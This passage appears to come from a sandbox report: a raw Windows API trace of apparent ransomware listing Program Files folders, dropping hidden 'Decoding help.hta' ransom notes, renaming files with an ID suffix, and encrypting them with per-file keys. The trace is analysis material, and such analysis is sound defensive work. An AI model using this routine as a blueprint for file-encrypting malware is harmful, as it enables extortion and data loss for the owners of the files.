Sidebar\\*.*") returned 40 [0039.781] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\", lpString2="hopefully_pledge_nor.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe" [0039.781] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe" [0039.781] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.781] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe" (normalized: "c:\\program files\\windows sidebar\\hopefully_pledge_nor.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\hopefully_pledge_nor.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\hopefully_pledge_nor.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\hopefully_pledge_nor.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0039.782] CreateFileMappingA (hFile=0x210, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x218 [0039.782] CryptAcquireContextA (in: phProv=0x9ecfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9ecfcec*=0x5dd910) returned 1 [0039.783] CryptGenKey (in: hProv=0x5dd910, Algid=0x6610, dwFlags=0x1, phKey=0x9ecfce8 | out: phKey=0x9ecfce8*=0x5a56b0) returned 1 [0039.783] CryptExportKey (in: hKey=0x5a56b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9ecfbe4, pdwDataLen=0x9ecfce4 | out: pbData=0x9ecfbe4*, pdwDataLen=0x9ecfce4*=0x2c) returned 1 [0039.783] MapViewOfFile (hFileMappingObject=0x218, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x510000 [0039.785] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9ecfbe4*, pdwDataLen=0x9ecfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x9ecfbe4*, pdwDataLen=0x9ecfcf8*=0x100) returned 1 [0039.785] CryptEncrypt (hKey=0x5a56b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x510000, pdwDataLen=0x9ecfce4*=0x12800, dwBufLen=0x12800) Thread: id = 99 os_tid = 0xbc0 [0039.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*", lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553ced90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a55b0 [0039.777] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.777] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553ced90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.777] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.777] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0039.777] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0039.777] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0039.777] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0039.777] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" [0039.777] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned 38 [0039.777] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft" [0039.777] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft\\*.*" [0039.777] GlobalMemoryStatus (in: lpBuffer=0xa00fd10 | out: lpBuffer=0xa00fd10) [0039.777] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f48f50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e0 [0039.814] CloseHandle (hObject=0x1e0) returned 1 [0039.815] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8de300, ftCreationTime.dwHighDateTime=0x1cacf26, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a8de300, ftLastWriteTime.dwHighDateTime=0x1cacf26, nFileSizeHigh=0x0, nFileSizeLow=0x2fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.InfoPath.targets", cAlternateFileName="MICROS~1.TAR")) returned 1 [0039.815] lstrcpyW (in: lpString1=0x3440458, lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" [0039.815] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned 38 [0039.815] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Decoding help.hta" [0039.815] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\decoding help.hta")) returned 0xffffffff [0039.815] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Decoding help.hta" (normalized: "c:\\program files (x86)\\msbuild\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0039.861] WriteFile (in: hFile=0x220, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa00fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa00fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.862] CloseHandle (hObject=0x220) returned 1 [0039.862] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.862] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Office.InfoPath.targets") returned -1 [0039.862] lstrlenW (lpString="Microsoft.Office.InfoPath.targets") returned 33 [0039.863] lstrcmpiW (lpString1="[ID]", lpString2="gets") returned -1 [0039.863] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*" [0039.863] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\MSBuild\\*.*") returned 38 [0039.863] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\", lpString2="Microsoft.Office.InfoPath.targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" [0039.863] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" [0039.863] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.[ID]g9uZrLhJaygpwRm1[ID]" [0039.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.889] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\msbuild\\microsoft.office.infopath.targets.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0039.889] CreateFileMappingA (hFile=0x220, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x230 [0039.889] CryptAcquireContextA (in: phProv=0xa00fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa00fcec*=0x5b0220) returned 1 [0039.890] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0xa00fce8 | out: phKey=0xa00fce8*=0x5a58b0) returned 1 [0039.890] CryptExportKey (in: hKey=0x5a58b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa00fbe4, pdwDataLen=0xa00fce4 | out: pbData=0xa00fbe4*, pdwDataLen=0xa00fce4*=0x2c) returned 1 [0039.890] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2e0) returned 0x2d0000 [0039.925] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa00fbe4*, pdwDataLen=0xa00fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa00fbe4*, pdwDataLen=0xa00fcf8*=0x100) returned 1 [0039.926] CryptEncrypt (in: hKey=0x5a58b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2d0000*, pdwDataLen=0xa00fce4*=0x2e0, dwBufLen=0x2e0 | out: pbData=0x2d0000*, pdwDataLen=0xa00fce4*=0x2e0) returned 1 [0039.926] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0039.927] CloseHandle (hObject=0x230) returned 1 [0039.927] CryptDestroyKey (hKey=0x5a58b0) returned 1 [0039.927] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.927] SetFilePointerEx (in: hFile=0x220, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.927] WriteFile (in: hFile=0x220, lpBuffer=0xa00fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa00fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa00fbe4*, lpNumberOfBytesWritten=0xa00fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.928] WriteFile (in: hFile=0x220, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa00fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa00fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.928] CloseHandle (hObject=0x220) returned 1 [0039.928] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\MSBuild\\Microsoft.Office.InfoPath.targets.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.929] FindNextFileW (in: hFindFile=0x5a55b0, lpFindFileData=0xa00fd30 | out: lpFindFileData=0xa00fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a8de300, ftCreationTime.dwHighDateTime=0x1cacf26, ftLastAccessTime.dwLowDateTime=0x553ced90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4a8de300, ftLastWriteTime.dwHighDateTime=0x1cacf26, nFileSizeHigh=0x0, nFileSizeLow=0x2fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Office.InfoPath.targets", cAlternateFileName="MICROS~1.TAR")) returned 0 [0039.929] FindClose (in: hFindFile=0x5a55b0 | out: hFindFile=0x5a55b0) returned 1 Thread: id = 100 os_tid = 0xbc4 [0039.813] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*", lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5630 [0039.814] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.814] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1046d870, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x1046d870, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.814] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.814] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.814] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8113830, ftCreationTime.dwHighDateTime=0x1d4a774, ftLastAccessTime.dwLowDateTime=0x6c747140, ftLastAccessTime.dwHighDateTime=0x1d4d918, ftLastWriteTime.dwLowDateTime=0x6c747140, ftLastWriteTime.dwHighDateTime=0x1d4d918, nFileSizeHigh=0x0, nFileSizeLow=0x12800, dwReserved0=0x0, dwReserved1=0x0, cFileName="mediawiki.exe", cAlternateFileName="MEDIAW~1.EXE")) returned 1 [0039.814] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" [0039.814] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned 51 [0039.814] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Decoding help.hta" [0039.814] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\decoding help.hta")) returned 0xffffffff [0039.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Decoding help.hta" (normalized: "c:\\program files (x86)\\reference assemblies\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0039.823] WriteFile (in: hFile=0x220, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa14fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xa14fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.824] CloseHandle (hObject=0x220) returned 1 [0039.824] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.842] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mediawiki.exe") returned -1 [0039.842] lstrlenW (lpString="mediawiki.exe") returned 13 [0039.842] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" [0039.843] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned 51 [0039.843] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\", lpString2="mediawiki.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe" [0039.843] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe" [0039.843] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0039.843] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe" (normalized: "c:\\program files (x86)\\reference assemblies\\mediawiki.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\mediawiki.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0039.843] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\reference assemblies\\mediawiki.exe.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0039.843] CreateFileMappingA (hFile=0x234, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x238 [0039.843] CryptAcquireContextA (in: phProv=0xa14fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xa14fcec*=0x5b0220) returned 1 [0039.844] CryptGenKey (in: hProv=0x5b0220, Algid=0x6610, dwFlags=0x1, phKey=0xa14fce8 | out: phKey=0xa14fce8*=0x5a5870) returned 1 [0039.844] CryptExportKey (in: hKey=0x5a5870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xa14fbe4, pdwDataLen=0xa14fce4 | out: pbData=0xa14fbe4*, pdwDataLen=0xa14fce4*=0x2c) returned 1 [0039.844] MapViewOfFile (hFileMappingObject=0x238, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12800) returned 0x9b10000 [0039.847] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa14fbe4*, pdwDataLen=0xa14fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xa14fbe4*, pdwDataLen=0xa14fcf8*=0x100) returned 1 [0039.847] CryptEncrypt (in: hKey=0x5a5870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x9b10000, pdwDataLen=0xa14fce4*=0x12800, dwBufLen=0x12800 | out: pbData=0x9b10000*, pdwDataLen=0xa14fce4*=0x12800) returned 1 [0039.848] UnmapViewOfFile (lpBaseAddress=0x9b10000) returned 1 [0039.850] CloseHandle (hObject=0x238) returned 1 [0039.850] CryptDestroyKey (hKey=0x5a5870) returned 1 [0039.850] CryptReleaseContext (hProv=0x5b0220, dwFlags=0x0) returned 1 [0039.850] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0039.850] WriteFile (in: hFile=0x234, lpBuffer=0xa14fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xa14fcf8, lpOverlapped=0x0 | out: lpBuffer=0xa14fbe4*, lpNumberOfBytesWritten=0xa14fcf8*=0x100, lpOverlapped=0x0) returned 1 [0039.851] WriteFile (in: hFile=0x234, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xa14fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xa14fcf8*=0x500, lpOverlapped=0x0) returned 1 [0039.851] CloseHandle (hObject=0x234) returned 1 [0039.852] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\mediawiki.exe.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0039.852] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0039.852] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0039.852] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0039.852] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0039.852] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*" [0039.852] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\*.*") returned 51 [0039.852] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft" [0039.852] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\*.*" [0039.852] GlobalMemoryStatus (in: lpBuffer=0xa14fd10 | out: lpBuffer=0xa14fd10) [0039.853] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5f79020, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0039.863] CloseHandle (hObject=0x234) returned 1 [0039.864] FindNextFileW (in: hFindFile=0x5a5630, lpFindFileData=0xa14fd30 | out: lpFindFileData=0xa14fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x80105472, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x80105472, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0039.864] FindClose (in: hFindFile=0x5a5630 | out: hFindFile=0x5a5630) returned 1 Thread: id = 101 os_tid = 0xbc8 [0039.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Uninstall Information\\*.*", lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, ftLastWriteTime.dwLowDateTime=0x10505df0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.821] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.821] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0xa28fd30 | out: lpFindFileData=0xa28fd30*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x8907f814, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x10505df0, ftLastAccessTime.dwHighDateTime=0x1d526b8, 